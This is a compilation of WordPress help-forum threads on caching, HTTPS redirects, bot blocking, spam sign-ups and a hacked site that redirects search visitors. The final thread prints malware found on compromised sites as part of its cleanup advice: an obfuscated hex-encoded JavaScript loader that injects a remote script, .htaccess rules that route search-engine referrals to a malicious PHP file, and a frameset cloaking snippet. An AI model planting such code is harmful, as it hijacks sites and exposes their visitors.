What is going on with my Wordpress Website? - wordpress

This problem started yesterday.
When the public visitor view my website, the Wordpress navigation bar will appear on top of the page as if they are a login user. They can even see the greeting message on top right corner, "Howdy, John(My name)"
The good news is, these public visitors will not be able to access the wordpress configuration page. They can only thee the top navigation bar when they view the page.
My question is, what is going on?
Could it be a plugin?
Could it be CDN (Cloudflare) problem?
Could it be the hosting site problem?
or could it be a hacker's deed?
Please help, I have no idea where to begin with.

You're probably serving fully cached pages (which includes the logged-in user content) for all visitors. This means that a new visitor will get served the exact same HTML and other assets that have been served earlier for a logged-in user.
I would start by checking the Cloudflare settings and see whether there are any options for disabling the cache for certain types of visitors (e.g. validated by cookies).

Problem solved.
Apparently, the culprit is the wrong configuration in Apache Server.
One of our engineer added the snippet below into the .htaccess as a recommendation from LiteSpeed module for Wordpress. This little devil makes Apache server to do full-page caching.
<IfModule LiteSpeed>
CacheEnable public /
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(HEAD|GET)$
RewriteCond %{REQUEST_URI} !^/(wp-admin|wp-login.php|wp-cron.php)
RewriteRule .* - [E=Cache-Control:max-age=120]
</IfModule>
Thank you #ojrask for pointing out the possibility of full-page caching in Apache Server.

Related

Mixed Content Exception in Wordpress

I'm getting the following error when submitting a Ninja form that was integrated to the wordpress site.
Mixed Content: The page at 'https://my.domain/event/test-page/' was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint 'http://my.domain/wp-admin/admin-ajax.php'. This request has been blocked; the content must be served over HTTPS.
That is the only error that I'm getting.
The site runs in HTTPS.
A quick help is utmost appreciated.
Install the plugin Really Simple SSL. Once installed and activated, click on "Go Ahead!" Blue button to activate it.
Are you seeing the mixed content error in WordPress? Mixed content error in WordPress is caused by incorrect HTTPs/SSL settings. Often times it doesn’t affect your website’s functionality, but it can have adverse affects on your website’s SEO and user experience. In this article, we will show you how to fix the mixed content error in WordPress.
For more details:
http://www.wpbeginner.com/plugins/how-to-fix-the-mixed-content-error-in-wordpress-step-by-step/
You could try forcing all http requests to redirect to https. This is a blunt-force tool to solve issues like this, but not elegant.
Place this in your .htaccess file above the #BEGIN WordPress line
RewriteEngine On
RewriteBase /
RewriteCond %{HTTPS} off
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
Richard, Arta, and Gufran's answers are satisfactory. I simply offer an alternative. If you have a cpanel, go to domains and toggle the 'Force https Redirect' next to your domain

Wordpress Site block Joomla URLs using hatches

I have a wordpress site on SiteGround and have hundreds of attempts entering looking for http://example.com/?option=com_k2&view=itemlist&task=user&id=93265
The old site used Joomla and it appears that bots still have the site on their list.
Please let me know if there is a way to prevent these requests from causing an "execution" of index.php as this has a 20,000 execution daily limit on Siteground shared host. Passing the limit causes the site to be disabled.
Thanks in advance for any suggestions.
Found this on http://botcrawl.com/how-to-block-incoming-traffic-backlinks-attempted-site-hijacks-and-multiple-urls-in-the-htaccess-file/
RewriteCond %{QUERY_STRING} option=com_k2
RewriteRule ^ - [F]
It appears to working. I'll write back if not.

New WordPress Users registered while site is still under development

Recently I started a new WordPress blog and didn't add any forms for user registrations. But I got a email from my site saying that new users was registered. Still I haven't written any post or didn't advertise anything. still Im building it. When I check the site users it was as below.
Now my questions are,
1) What kind of attack is this. How did a attacker find my site while im just building it?
2)They are registered as subscribers, am I safe to just delete them?
any guideline from an expert will be highly appreciated. please advice me what should I do? Thanks.
Is it on WordPress.com or self-hosted? And yes, it's ok to delete them.
It may not be an 'attack'. If you are on WordPress.com (or even self-hosted) it may just be other users that came across the site. There are a lot of possibilities of who they are.
You can turn off allowing registrations in your Admin Settings and put up a landing page to show no content to unauthorized users while you're working on it.
If you're self-hosting it you can use your .htaccess to allow only your own IP address access while you're working on it.
.htaccess
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{REQUEST_URI} ^(.*)?wp-login\.php(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)?wp-admin$
RewriteCond %{REMOTE_ADDR} !^YOUR_IP_ADDRESS$
RewriteRule ^(.*)$ - [R=403,L]
</IfModule>
Also, just to make sure no one has tried an attack, you can use a plugin like WordFence to do a security audit.
You can use the Wordfence plugin to secure your WordPress installation. The Wordfence plugin protects against brute force attacks and allows blocking ips.

How to rewrite https to http for a specific url?

I'm seeking help with an issue, basically my entire ecommerce website runs on HTTPS with wordpress but I have recently become affiliated with ebay.
However when I try to display their products on my site using a HTTPS page none of the images show and I get this error:
Failed to load resource: net::ERR_INSECURE_RESPONS https://thumbs2.ebaystatic.com/m/mPA8yaCHEhocIoW2TdC-0hQ/140.jpg
I'm trying to change (https example.com/shop/ebay-shop/) to (http example.com/shop/ebay-shop/)
so that the images are displayed correctly. Unless anyone knows how I can make the images load without having to redirect to http?
Thanks.
Try adding this to the top of the htaccess file in your document root:
RewriteEngine On
RewriteCond %{HTTPS} on
RewriteRule ^shop/ebay-shop/ http://example.com%{REQUEST_URI}
Note, you'll need to be careful with any wordpress plugins or settings that will attempt to re-redirect such a request back to https. If that happens, you'll end up with a redirect loop.

page redirect after Google search - Wordpress site hacked

We have the page domain.., and when you search at google.nl to Critical Alignment and click at the homepage of the site you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but can not find a redirect or anything.
Can someone help?
Have you checked if the redirect is made where the domain is hosted? Don't know what kind of host you use, but maybe the domain is set to redirect to that page from the host's side.
A good guide on what to do when your site gets hacked is this: http://codex.wordpress.org/FAQ_My_site_was_hacked
For your issue, check .htaccess first. There might be some redirect lines on the farthest right side of the file, so use the horizontal scroll bar.
Also, I would suggest to check with your host, since there might be many more files affected.
The same thing happened to me also.
First i thought it was a DNS hack problem, since it was a redirection problem. The hosting company responded to me that the DNS had no problems. Tey checked other common problems to find the source of the redirection and I was told that I had a malitious script in the header.php file, in the active theme foloder.
I manually checked the file in cPanel and I found the script that caused the redirection. To read more about this check the article on IStartBlogging
A new virus is spreading that is abusing the xmlrpc.php of wordpress to inject itself into the server and replace the javascript files with its own contaminated copies.
If you see too many xmlrpc requests POST requests from a suspicious ip-address, such as the below, verify the integrity of your javascript files.
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
One key feature of this virus is, it primarily targets the jQuery.js, replacing it with its own version (that when users browsers to your site, automatically redirects them to clickbait articles).
It achieves this by first posting a new php files, such as recure.php which usually contain obfuscated php code, or uploading wordpress plugins to the upload folder.
Most probably the attackers are trying to redirect the page to a different web site if the referred pages are google, yahoo, msn, aol, bing.
They will give back a frameset( similar to iframe) when we request the pages from above-specified referrals.
<frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
<frame src="http://remote_site_address_here" noresize="" scrolling="auto">
<link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>
So we will see our website name at the top of the address bar but the site content will be different. These are the common files that the hackers used to inject suspicious code.
index.php
index.html
header.php
footer.php
functions.php
theme files
.htaccess
Nowadays the recently infected cases are showing the malicious code injection is with .htaccess file. Here I am demonstrating the injected .htaccess file.
Open your .htaccess file in the web root directory. And you can see this configurations
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]
Here they are redirecting to the malicious php file emilie-amethyst.php if the referral pages are google|yahoo|msn|aol|bing. This is the reason of that redirect issue.
So You have to remove this redirection configuration from your .htaccess file and also remove the malicious script (in this case it is emilie-amethyst.php).
Try to click the link from google search. still, if you see the problem, then remove all cookies related to this particular site and retry. It should solve the issue

Resources